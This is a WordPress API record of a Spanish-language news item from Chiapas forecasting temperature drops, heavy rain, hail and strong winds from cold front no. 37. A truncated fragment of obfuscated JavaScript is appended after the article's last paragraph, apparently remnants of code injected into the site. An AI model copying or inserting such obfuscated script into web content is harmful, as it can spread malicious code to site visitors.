{"id":21301,"date":"2025-04-07T03:01:36","date_gmt":"2025-04-07T03:01:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21301"},"modified":"2025-04-07T03:01:37","modified_gmt":"2025-04-07T03:01:37","slug":"alertan-por-descenso-de-temperatura-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21301","title":{"rendered":"Alertan por descenso de temperatura en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"937\" height=\"788\" data-id=\"21302\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250406-WA0018.jpg\" alt=\"\" class=\"wp-image-21302\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250406-WA0018.jpg 937w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250406-WA0018-300x252.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250406-WA0018-768x646.jpg 768w\" sizes=\"auto, (max-width: 937px) 100vw, 937px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>6 de abril del 2025. Tuxtla Guti\u00e9rrez.- El Meteorol\u00f3gico Nacional (SMN), informo que habr\u00e1 un descenso de 5 a 9 \u00b0C en las temperaturas m\u00e1ximas en la mayor\u00eda de regiones de la entidad este domingo, a partir de este domingo seis de abril.<\/p>\n\n\n\n<p>El descenso y el periodo fresco para el estado ser\u00e1 dado por el paso del frente fr\u00edo n\u00fam. 37 por el sureste del pa\u00eds, hay una advertencia por las precipitaciones que acompa\u00f1ar\u00e1n al sistema frontal, se prev\u00e9n acumulados de 75 a 150 mm en algunas regiones; las lluvias comenzar\u00e1n a ser m\u00e1s puntuales partir de la tarde del domingo y prevalecer\u00e1n hasta el lunes.<\/p>\n\n\n\n<p>Las regiones del Norte, Maya, Selva Lacandona, Tulij\u00e1, de los Bosques, Altos, Mezcalapa y Meseta Comiteca, ser\u00e1n las que m\u00e1s resentir\u00e1n los acumulados de lluvia que podr\u00e1n estar acompa\u00f1adas de descargas el\u00e9ctricas y ca\u00edda de granizo, as\u00ed como rachas de viento fuertes podr\u00edan ocasionar ca\u00edda de \u00e1rboles.<\/p>\n\n\n\n<p>Las lluvias podr\u00edan incrementar los niveles de r\u00edos y arroyos, generar deslaves, encharcamientos e inundaciones en zonas bajas. La recomendaci\u00f3n es estar atento a los mensajes que emitan las autoridades de Protecci\u00f3n Civil.<\/p>\n\n\n\n<p>Por cierto, la masa de aire fr\u00edo que impulsar\u00e1 el frente, originar\u00e1 un evento de \u201cNorte\u201d fuerte a intenso con rachas de viento de 80 a 100 km\/h en istmo y golfo de Tehuantepec (Oaxaca y Chiapas).<\/p>\n\n\n\n<p>Las condiciones de frescor, van a extenderse hasta el d\u00eda martes, cuando la masa de aire comenzar\u00e1 a debilitarse y cambiar sus condiciones t\u00e9rmicas, hacia el d\u00eda mi\u00e9rcoles se espera una recuperaci\u00f3n de las temperaturas m\u00e1ximas.<\/p>\n\n\n\n<p>Este mismo domingo por la tarde se report\u00f3 lluvias intensas en el municipio de Huitiup\u00e1n lo que ocasion\u00f3 encharcamiento de viviendas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 6 de abril del 2025. Tuxtla Guti\u00e9rrez.- El Meteorol\u00f3gico Nacional (SMN), informo que habr\u00e1 un descenso de 5 a 9 \u00b0C en las temperaturas m\u00e1ximas en la mayor\u00eda de regiones de la entidad este domingo, a partir de este domingo seis de abril. El descenso y el periodo fresco para el estado ser\u00e1 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21302,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21301","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21301","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21301"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21301\/revisions"}],"predecessor-version":[{"id":21303,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21301\/revisions\/21303"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21302"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21301"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21301"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21301"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}